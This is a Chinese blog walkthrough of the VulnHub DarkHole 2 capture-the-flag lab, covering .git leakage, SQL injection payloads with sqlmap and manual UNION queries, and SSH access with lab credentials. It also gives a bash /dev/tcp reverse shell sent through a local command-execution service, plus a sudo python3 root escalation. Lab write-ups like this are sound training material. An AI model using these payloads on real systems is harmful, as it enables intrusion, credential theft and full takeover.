VulnHub-DarkHole_ 2靶机详细渗透过程

最新推荐文章于 2025-04-04 16:57:42 发布
最新推荐文章于 2025-04-04 16:57:42 发布
阅读量1.6k 收藏 14
点赞数 2
分类专栏: 教程 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MRS_jianai/article/details/128480361
版权

1.靶机部署

kali安装:https://blog.youkuaiyun.com/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载:https://download.vulnhub.com/darkhole/darkhole_2.zip
得到三个文件,稍后需要打开的shi.ovf的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
虚拟机的基本设置:
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 探测IP

使用nmap扫描同一个段下存活的IP

nmap 192.168.11.0/24

发现153开启了80端口,通过访问确实是我们的靶机!
image.png

2.2 详细信息扫描

使用nmap对靶机开放的端口进行更详细的扫描:

nmap -A -T4 -p- 192.168.11.154

image.png

2.3 敏感目录

dirsearch -u 192.168.11.154 -e *

image.png

2.4 指纹收集

whatweb -v 192.168.11.154

image.png

3.渗透过程

3.1 访问敏感目录

扫描敏感目录的时候扫出一个.git目录,访问一下发现确实有东西,那猜测一下这里会不会存在
image.png

3.2 git泄露

使用git-dumper分析git文件
没有的话安装一下:

3.2.1 pip安装git-dumper

我这里是使用pip3安装,因为之前安装过了,第一次安装可能要多等一会儿

pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn git-dumper

image.png

3.2.2 使用git-dumper下载git文件夹内容到backup文件夹:

git-dumper http://192.168.11.154/.git/ backup

image.png

3.3.3 切换到backup文件夹,查看日志

git log

到这里呢就不得不说一下强大的git log命令了:

git log命令详解:https://blog.youkuaiyun.com/u012260238/article/details/81673853

在这里呢我们没有带任何参数,大概意思是:

不带任何参数,它会列出所有历史记录,最近的排在最上方,显示提交对象的哈希值,作者、提交日期、和提交说明
如果记录过多,则按Page Up、Page Down、↓、↑来控制显示
按q退出历史记录列表

然后我们就可以看到有三次提交,还有提交的哈希值,作者,时间等等。
image.png

3.3.4 对比三次提交

使用diff对比一下:git diff可以获得当前工作目录和上次提交与本地索引的差距,也就是可以获取本次你在什么地方修改了代码。
三个哈希值一个一个试嘛,我这里是试到第二个发现里面有东西:
这里好像是一组用户名和密码:

lush@admin.com
321

image.png

3.3 登录网页

登录页面在首页的右上方,输入我们刚得到的用户名和密码:
image.png
这样呢我们就登录成功了!!!
image.png
进图页面呢我们可以看到URL里面有个id=1,大胆猜测一下会不会存在注入:
image.png
当我们将id的值改为null的时候,发现页面的信息消失了,当然也不可能存在id为null的用户:
image.png
后面再加个单引号,发现报错了,到这里我们就可以确定了该页面存在sql注入:
image.png

3.4 注入

3.4.1 获取当前网站的cookie值:

不会?找不到?点我主页,置顶的帖子里面有我的联系方式,我手把手叫你。[怒]
image.png

3.4.2 利用cookie进行注入爆破当前数据库

sqlmap -u http://192.168.11.154/dashboard.php?id=1 --cookie PHPSESSID=gjl8s8qe5g9qke0ondmvnumo9k --current-db

这样呢我们就得到了一个数据库名。
image.png

3.4.3 获取数据库darkhole_2的表名

sqlmap -u http://192.168.11.154/dashboard.php?id=1 --cookie PHPSESSID=gjl8s8qe5g9qke0ondmvnumo9k -D darkhole_2 -T ssh -dump

得到两个表:

ssh
users

image.png

3.4.4 获取敏感信息

sqlmap -u http://192.168.11.154/dashboard.php?id=1 --cookie PHPSESSID=gjl8s8qe5g9qke0ondmvnumo9k -D darkhole_2 -T ssh -dump

image.png

3.5 手注

3.5.1 使用ORDER BY来确定回显注入位:

id=1' ORDER BY 1 -- -
id=1' ORDER BY 2 -- -
id=1' ORDER BY 3 -- -
id=1' ORDER BY 4 -- -
id=1' ORDER BY 5 -- -
id=1' ORDER BY 6 -- -
id=1' ORDER BY 7 -- -

第7列报错,说明可能只有6位:
image.png
image.png

3.5.2 查看当前数据库:

?id=NULL’ UNION ALL SELECT 1,GROUP_CONCAT(schema_name),3,4,5,6 FROM information_schema.schemata – -

image.png

3.5.3 再查询数据库中的表:

id=NULL’ UNION ALL SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=‘darkhole_2’-- -

image.png

3.5.4 查询表中的列名:

id=NULL’ UNION ALL SELECT 1,GROUP_CONCAT(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=‘ssh’-- -

image.png

3.5.5 查询用户名:

id=NULL’ UNION ALL SELECT 1,user,pass,4,5,6 FROM ssh-- -

image.png

3.6 SSH连接

账号密码已经得到,使用ssh登录:

用户名: jehad
密码:fool

image.png

3.7 提权

3.7.1 查看权限

sudo -l

image.png

3.7.2 查找SUID文件

find / -user root -perm -4000 -print 2>/dev/null

image.png

3.7.3 查看计划任务

cat /etc/crontab

发现有一个运行在9999端口上的计划任务:
image.png
查看具体内容:
可以看到这是允许远程命令执行。
image.png

3.7.4 查看passwd文件

cat /etc/passwd | grep “/bin/bash”

可以看到有好几个用户:
image.png

3.7.5 查看历史命令

cat .bash_history

image.png

3.7.6 查看服务详细

curl “http://127.0.0.1:9999/?cmd=id”

curl是一个命令行访问URL的工具,作用是发出网络请求,然后得到和提取数据,显示在"标准输出"(stdout)上面。可以用它构造http request报文,且可以解析服务器返回的http response,额外还支持cookie特性,可以用curl完成web浏览器的基本功能,curl还支持HTTPS/FTP/FTPS/TELNET/LDAP等协议。
可以看到这个服务是losy用户的:
image.png

3.7.7 获取losy的权限

重新连接登陆 ssh,将本地端口 9999 端口与远程主机端口映射,访问本地端口转发到远程主机

image.png

3.7.8 反弹shell

这里简单说两句:
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。而且这个脚本属于用户losy,然后我们就可以使用 SSH 隧道连接端口 9999,然后,访问 127.0.0.1:9999 进行 RCE。大概原理就是这样。
具体操作:

  • SSH隧道连接
  • 构造连接kali的命令:

bash -c ‘bash -i >& /dev/tcp/192.168.11.128/9001 0>&1’

  • 使用URL编码进行编码:

bash%20-c%20’bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.128%2F9001%200%3E%261’

  • kali开启监听
  • 浏览器访问:

http://127.0.0.1:9999/?cmd=bash%20-c%20’bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.128%2F9001%200%3E%261’

  • 或者直接使用curl:

curl http://127.0.0.1:9999/?cmd=bash%20-c%20’bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.128%2F9001%200%3E%261’

成功拿到losy的权限:
image.png
查看losy的历史命令:
image.png
得到密码:gang

3.7.9 反弹shell失败的解决办法

其实可以直接在URL里通过修改cmd的参数值读取history文件:

http://127.0.0.1:9999/?cmd=cat%20~/.bash_history

image.png

3.7.10 登录losy用户

ssh losy@192.168.11.154

image.png
查看权限:

sudo -l

image.png
发现有root身份执行python3的权限,python提权还是比较简单的,这可能是作者见我们前面太辛苦,这里给我们一点福利吧!
开始提权:
写一个脚本,作用是打开一个shell,用户sudo执行,那么这个shell就具有root的权限:

import os; 
os.setuid(0); 
os.system("/bin/sh")

我比较懒,我就一句话搞定了:

sudo python3 -c ‘import os; os.setuid(0); os.system(“/bin/sh”)’

image.png

夺旗!!!

image.png

DarkHole_2
追求卓越,技术流~
01-14 1692
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
2024年最新VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
2401_84239830的博客
05-01 1349
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。而且这个脚本属于用户losy,然后我们就可以使用 SSH 隧道连接端口 9999,然后,访问 127.0.0.1:9999 进行 RCE。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1385
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2
Vulnhub靶场:Darkhole:2
最新发布
a3314019530的博客
04-04 743
1.git泄露2.sql注入3.ssh隧道4.sudo提权。
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1599
vulnhub靶场 DarkHole: 2,难度:困难级别
靶机-DarkHole_2
weixin_58602402的博客
06-14 228
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。方法一:wget -r http://192.168.12.168/.git/10.先ssh进行登录losy/gang,根据获取的命令利用python调sh。3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露。1.主机发现,发现靶机ip:192.168.12.168。4.到查找到的目录下查看,发现webshell文件。爆内容,发现用户和密码:jehad/fool。1.用获得的用户和密码进行ssh登录。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 6352
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 755
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
DarkHole_1
追求卓越,技术流~
01-13 984
Vulnhub靶机其实都差不多,前面的相似步骤就不在讲解了,直接开始 文章目录渗透环境扫描目录逻辑漏洞文件上传漏洞suid提权命令劫持提取总结 渗透环境 攻击机:kali IP:192.168.247.129 靶机DarkHole_1 IP:192.168.247.130 扫描目录 ┌──(root????kali)-[/home/kali] └─# dirb http://192.168.247.130 ---- Scanning URL: http://192.168.247.130/ --
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1365
一次渗透测试靶机练习
darkhole2
qq_62144749的博客
09-02 490
vulnhub darkhole2
DarkHole_2靶机渗透攻略
weixin_47311099的博客
01-12 948
信息收集 主机发现 nmap -sC -sV 192.168.93.0/24 -p- 目标:192.168.93.134 开放22ssh,80http 网站信息收集 并未发现太多信息 但是根据nmap的扫描结果可知,目录192.168.93.134:80/.git/ 存在git泄露。 ​ git泄露漏洞利用 下载git源码 ​python2 GitHack.py http://192.168.93.134/.git ​ ​ 密码逻辑流程 在logon.php中可以发现用户、密码的处理逻辑 ​
vulnhubdarkhole_2
weixin_54431413的博客
07-04 819
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
DARKHOLE: 2
weixin_45042115的博客
10-05 1940
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
DarkHole2渗透测试
weixin_43769253的博客
07-29 545
vulnhub靶机DarkHole2渗透记录 难度:高
Dark_hole2靶机实战——详细
qq_74243714的博客
07-02 914
Sorry, user jehad may not run sudo on darkhole.(不可 sudo提权)--------------计划任务提权-------------sudo -l (发现不能够使用sudo,因为没有losy密码)发现修改历史中有账号和密码,以及dashboard.php页面。方法二:josy用户退回到根目录查看所有文件(包括隐藏文件)SSH登录losy用户(sudo提权)发现账号管理页面,可以修改账号信息。方法一:想到爆破密码(一般不建议)获取到SSH用户密码!
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2584
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
DarkHole_2打靶记录
wwd180的博客
06-14 278
实验主机:攻击机kali 靶机DarkHole实验目标:取得 root 权限 + 2 Flag实验网络:桥接模式。
Vulnhub_Darkhole_2
qq_45434762的博客
12-04 607
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关。主机信息kali:192.168.31.136 Darkhole_2:192.168.31.72信息收集使用netdicover发现目标主机IP为192.168.31.72然后使用nmap对目标机器进...
VulnHub-Tr0ll1靶机学习笔记与文档整理
Tr0ll1是VulnHub上的一个靶机,它的设计目的是让使用者通过渗透测试来发现和利用漏洞,最终获取系统权限。 靶机学习笔记通常包括了攻击者在进行渗透测试时的思路和步骤记录,可以帮助新手理解渗透测试的流程,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值